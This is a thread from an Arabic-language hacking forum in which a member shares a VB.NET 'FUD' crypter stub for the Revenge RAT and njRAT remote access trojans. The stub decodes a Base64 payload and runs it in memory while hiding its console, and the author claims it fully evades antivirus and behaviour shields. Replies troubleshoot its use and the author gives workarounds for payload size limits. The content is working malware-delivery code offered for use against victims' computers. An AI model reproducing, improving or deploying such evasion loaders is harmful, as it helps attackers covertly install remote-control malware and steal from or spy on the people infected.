New EntryPoint FUD (0/36) For Revenge RAT v0.3 By Salem Mahmoud

تم تحميل الصفحة في 1,2221300 ثانية
إنضم
15 نوفمبر 2017
المشاركات
109
الإعجابات
144
النقاط
43

برعاية نقطة التطوير

السلام عليكم ورحمة الله وبركاته

رجعتلكم بموضوع خفيف وبسيط لكن رح يساعدكم بشكل كبير

أظن عنوان الموضوع يكفي للشرح

أنا حسب تجربتي قمت بتجربتها على نجرات ورفينج رات

مع الرفينج رات النتيجة كلين 0/36 بدون أي تعديل على قيم البيس 64

مع النجرات النتيجة كلين 0/36 لكن مع تعديل بسيط وهو أنه يجب وضع القيم في My.Setting كوسيلة أخفاء للقيمة ولأنه قيم النجرات أكبر بكثير من قيم الرفينج رات وهذا ما يثير شك الحمايات أثناء محاولة تعرف الحماية على القيمة الناتجة

الأشياء الجديدة

لو تلاحظ يوجد أسلوب أستدعاء جديد تم عمله كنوع تشتيت للحمايات لأنه دائما أستغلال الدوال الجديدة أو طرق أستدعاء جديدة تعتبر حاجز للحمايات السبب أنه يتم تشغيل الملف الناتج بشكل مختلف عن باقي الطرق أو التشفيرات لهذا الحمايات لا تشعر بشيء

بالنسبة للدفاعات الأستباقية تخطي 100% حتى الحمايات التي تدعم فحص بالذاكرة أو درع السلوك لا تستطيع أن تشعر بشيء يعني تقدر تقول خمول كامل للحماية

تم التجربة على (كاسبر , النود , 360)

الكود :

كود:
Module Module1
    Sub Main()
        'Coded By Salem Mahmoud EntryPoint FUD For Revenge RAT
        FreeConsole()
        Dim H1 As System.Object = CurrentDomain(FromBase64String("*_*"))
        Dim H2 As System.Object = Year(H1.EntryPoint.Invoke(0, New System.DBNull(1 - 2) {}))
    End Sub
    Public Function FromBase64String(ByVal Data As String) As Byte()
        Return CType(GetType(Convert).GetMethod("FromBase64String").Invoke(0, {Data}), Byte())
    End Function
    Public Function CurrentDomain(ByVal Data As Byte()) As Object
        Return System.AppDomain.CurrentDomain.Load(Data)
    End Function
    Declare Function FreeConsole Lib "kernel32" () As Int32
    Public Function Year(ByVal Data As Object) As Object
        Return Microsoft.VisualBasic.Year(Data)
    End Function
End Module
شرح طريقة الأستخدام حتى لا تواجه مشاكل :


في أمان الله
 

Alexey

Beginner Developer
rank
إنضم
23 ديسمبر 2017
المشاركات
8
الإعجابات
3
النقاط
3
العمر
22
Обнаружение Защитника Windows как вируса
 
إنضم
31 يوليو 2011
المشاركات
1,113
الإعجابات
359
النقاط
83
الإقامة
الجزائر

v4Team

Beginner Developer
rank
إنضم
7 أكتوبر 2016
المشاركات
59
الإعجابات
33
النقاط
18
العمر
27
Line is too long
كتبت السطر كده
((Dim H1 As System.Object = CurrentDomain(FromBase64String(My.Resources._Byte
و حطيت القيم في ملف تكست سميته _Byte.txt
السيرفر اتبني بس مجاش تبليغ
 
إنضم
15 نوفمبر 2017
المشاركات
109
الإعجابات
144
النقاط
43
Line is too long
كتبت السطر كده
((Dim H1 As System.Object = CurrentDomain(FromBase64String(My.Resources._Byte
و حطيت القيم في ملف تكست سميته _Byte.txt
السيرفر اتبني بس مجاش تبليغ
[QUOTE = "momoslim, сообщение: 6822238, участник: 114946"] Мир вам
Ссли эта проблема может быть решена


www.youtube.com/watch?v=e-uK1zpCNys
شباب نسخة الفيجوال تبعكم ما ما بتدعم طول القيم التي تبلغ أكثر طول العمود فيها اكث رمن 65535 عندك طريقتين للحل الأولى أنك تحط القيم في مكان غير مثل My.Setting او في الريسورس او استخدم نسخة الفيجوال ستوديو الذي انا استخدمها وهي Ultimate 2010 أو بتقدر أيضا تقسم القيم لأكثر من جزء وتستدعيهم في متغير واحد مثل

h1 = ""

h2 = ""

h3 = ""
 
الإعجابات: lodgy

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل